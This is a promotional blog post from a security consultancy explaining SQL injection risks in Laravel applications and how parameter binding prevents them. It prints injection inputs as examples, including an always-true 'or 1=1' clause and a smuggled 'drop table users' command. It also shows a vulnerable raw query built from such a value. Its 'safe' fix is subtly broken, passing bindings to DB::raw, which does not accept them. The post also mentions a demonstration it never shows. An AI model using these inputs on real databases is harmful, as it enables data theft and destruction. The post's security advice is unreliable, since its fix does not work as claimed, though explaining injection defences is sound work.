enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

What Is SQL Injection?

SQL Injection is a type of cyber attack that makes it possible to execute criminal SQL statements. These statements control the database server behind any web application. Hackers can use SQL Injection vulnerabilities to destroy application security measures. They can go around authentication of a web page and retrieve the content of the whole SQL database. They can also use SQL Injection to add, delete and modify records in the database. The best cyber security company that you approach will always provide the best to protect your database from SQL injection and attacks.

An SQL Injection vulnerability may affect any website that uses an SQL database such as MySQL, Oracle, or others. Criminals may use it to gain unauthorized access to your personal and highly important data like:

  • Customer information
  • Personal data
  • Trade secrets
  • Intellectual property and more

SQL Injection attacks are one of the oldest and very dangerous web application vulnerabilities. Cyber security service providers will help you with this serious problem.

Why Laravel Framework?

Laravel is a web app development framework with expressive and royal syntax that makes the entire web development process faster, simple, and more enjoyable for developers by eliminating all the pain points associated with handling the most complex PHP code.

It simplifies some of the mostly executed tasks like routing, authentication, sessions, caching, and others so that developers can focus on building most business-related features of the web application. Laravel protects the web apps from SQL injection as long as you're using the fluent query builder.

Laravel does this by making secured and prepared statements that are going to escape any user input that may come in through the apps. If attackers add a new input to a form, they may try to insert a query and then run their own SQL query to damage your application database. However, this won't work while you are using Eloquent. Eloquent is going to protect from this SQL query and the invalid query will just be saved as text into your database.

What Are The Types Of SQL Injection Attack Vectors That Laravel Can’t Protect?

Developers usually make mistakes by thinking Laravel protects from all SQL injections and attacks, while there are some attack points that Laravel cannot protect, here are the most common causes of SQL injections that we saw in the latest Laravel applications during our security Checks.

SQL Injection via column name

The first common mistake that we see is that a lot of people think that Laravel would escape any dimension that is passed to Query Builder or Eloquent. But in reality, it’s not that safe to pass user-controlled column names to the query builder.

It’s important to mention that the demonstrated attack point is fixed on the Laravel versions, but still, Laravel warns developers even in the new documentation to not pass user-controlled column names to Query Builder without whitelisting.

Commonly, even if there is no chance to turn a custom column into an injected SQL string, we still do not recommend allowing to sort the data by any user-provided column name, since it can introduce a dangerous security issue.

SQL Injection via validation rules

Let’s take a look at the following simplified validation code:

$id = $request->route('id');
$rules = [ 'username' => 'required|unique:users,name,' . $id,];

$validator = Validator::make($request->post(), $rules);

Whether Laravel uses $id here to command that database and $id is not escaped, it will allow a hacker to perform an SQL injection.

How to prevent SQL injection in Laravel?

Laravel’s Eloquent ORM uses PDO binding that protects web apps from SQL injections. This relevant feature ensures that no client could modify the intent of the SQL queries.

Consider the example of the form used to collect users’ email addresses from a database. the form will search for an email address, for instance, “[email protected]”. Now imagine that the SQL query is modified to:

SELECT * FROM users WHERE email = '[email protected]' or 1=1

In the above example, 1=1 is a simple expression that always evaluates to be true. If it is attached to the above query with the OR condition, the query will fetch all records from the table because the SELECT condition will evolve to be always true.

Now consider another direction of the attack in which the query is modified directly to the command “drop table users” and instead of the email address, “[email protected]” is written. The query will look like this:

SELECT * FROM users WHERE email = '[email protected]'; drop table users;

When this query is executed, the table “users” will be deleted from the database.

When the PDO parameter binding is in place, the input is in quotes and the query will look like this:

SELECT * FROM users WHERE email = '[email protected] or 1=1'

Since no records will match with either the email or the “1=1”, the query will not be returning anything.

This framework provides other ways of talking to databases, such as raw SQL queries. Yet, Eloquent remains one of the most popular options.

Laravel framework uses PDO binding to prevent SQL injection attacks because no variable gets to the database without validation.

If this is the case, one should always use prepared SQL queries to prevent misplacement. Consider the following statement that looks ripe for SQL injection:

Route::get('this-is-prone-to-sql-injection', function() {
$name = "'ancy' OR 1=1";
return DB::select(
DB::raw("SELECT * FROM users WHERE name = $name"));});

Here the statement 1=1 used in the OR condition will result in returning all the rows in the user’s table. This can be prevented by using the following code instead:

Route::get('safe-from-sql-injection', function() {
$name = "'ancy' OR 1=1";
return DB::select(
DB::raw("SELECT * FROM users WHERE name = ?", [$name]));});

Laravel replaces the question marks with the query, automatically escaping the input variables. This protects the query from SQL injection attacks.

If you have any queries about this topic or have to get services and consultations against this serious cyber threat. Feel free to contact us. AIRZERO SEC will be your strong firewall.
E-mail id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/
Email id: [email protected]